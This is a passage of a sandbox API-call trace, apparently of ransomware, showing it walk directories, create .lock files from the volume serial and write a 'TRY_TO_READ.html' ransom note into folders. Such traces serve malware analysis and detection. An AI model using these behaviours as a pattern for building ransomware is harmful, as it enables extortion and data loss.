(HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.306] GetLastError () returned 0x0 [0065.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0065.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472028 [0065.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447c28 [0065.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447c28 | out: hHeap=0x410000) returned 1 [0065.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472028 | out: hHeap=0x410000) returned 1 [0065.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.306] FindNextFileW (in: hFindFile=0x447be8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.307] GetLastError () returned 0x0 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472028 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447c28 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447c28 | out: hHeap=0x410000) returned 1 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472028 | out: hHeap=0x410000) returned 1 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.307] FindNextFileW (in: hFindFile=0x447be8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3069af50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.307] GetLastError () returned 0x0 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b80 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b80 | out: hHeap=0x410000) returned 1 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.307] FindNextFileW (in: hFindFile=0x447be8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3069af50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.307] CloseHandle (hObject=0x3cc) returned 1 [0065.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x46) returned 0x463c48 [0065.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0065.307] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.308] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x3bc)) [0065.308] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.308] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.308] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.308] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Documents and Settings9c354ca09c354b444c.lock") returned 49 [0065.308] CreateFileW (lpFileName="C:\\\\Documents and Settings9c354ca09c354b444c.lock" (normalized: "c:\\documents and settings9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.308] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.308] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.309] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.309] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.309] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0065.309] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472078 | out: hHeap=0x410000) returned 1 [0065.309] FindFirstFileW (in: lpFileName="C:\\\\Documents and Settings\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3069af50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0065.309] CloseHandle (hObject=0x3cc) returned 1 [0065.309] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.309] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x3bc)) [0065.309] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.309] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.310] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.310] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache9c354ca09c354b444c.lock") returned 35 [0065.310] CreateFileW (lpFileName="C:\\\\MSOCache9c354ca09c354b444c.lock" (normalized: "c:\\msocache9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.310] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.310] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.310] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472078 [0065.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720c8 | out: hHeap=0x410000) returned 1 [0065.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0065.310] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447c28 [0065.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.311] GetLastError () returned 0x0 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447c68 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447c68 | out: hHeap=0x410000) returned 1 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.311] FindNextFileW (in: hFindFile=0x447c28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.311] GetLastError () returned 0x0 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447c68 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447c68 | out: hHeap=0x410000) returned 1 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.311] FindNextFileW (in: hFindFile=0x447c28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.311] GetLastError () returned 0x0 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720c8 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0065.311] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720c8 | out: hHeap=0x410000) returned 1 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720c8 [0065.312] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0065.312] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.312] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.312] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.312] GetLastError () returned 0x0 [0065.312] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0065.312] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.312] GetLastError () returned 0x0 [0065.312] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b2c8 [0065.312] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e4 [0065.315] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.315] WriteFile (in: hFile=0x3e4, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.316] WriteFile (in: hFile=0x3e4, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.316] WriteFile (in: hFile=0x3e4, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.316] CloseHandle (hObject=0x3e4) returned 1 [0065.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0065.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0065.316] FindNextFileW (in: hFindFile=0x447c28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3069af50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.316] GetLastError () returned 0x0 [0065.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0065.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0065.317] FindNextFileW (in: hFindFile=0x447c28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3069af50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.317] CloseHandle (hObject=0x3cc) returned 1 [0065.317] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.317] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x3bc)) [0065.317] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.317] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.317] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.317] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\PerfLogs9c354ca09c354b444c.lock") returned 35 [0065.317] CreateFileW (lpFileName="C:\\\\PerfLogs9c354ca09c354b444c.lock" (normalized: "c:\\perflogs9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.318] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.318] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.318] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0065.318] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472078 | out: hHeap=0x410000) returned 1 [0065.318] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c978 | out: hHeap=0x410000) returned 1 [0065.318] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c9a0 | out: hHeap=0x410000) returned 1 [0065.318] FindFirstFileW (in: lpFileName="C:\\\\PerfLogs\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447c68 [0065.318] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.318] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.318] GetLastError () returned 0x0 [0065.318] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0065.318] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0065.318] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.318] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c978 [0065.318] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ca8 [0065.318] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ca8 | out: hHeap=0x410000) returned 1 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c978 | out: hHeap=0x410000) returned 1 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0065.319] FindNextFileW (in: hFindFile=0x447c68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.319] GetLastError () returned 0x0 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c978 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ca8 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ca8 | out: hHeap=0x410000) returned 1 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c978 | out: hHeap=0x410000) returned 1 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0065.319] FindNextFileW (in: hFindFile=0x447c68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.319] GetLastError () returned 0x0 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470aa0 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47c978 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 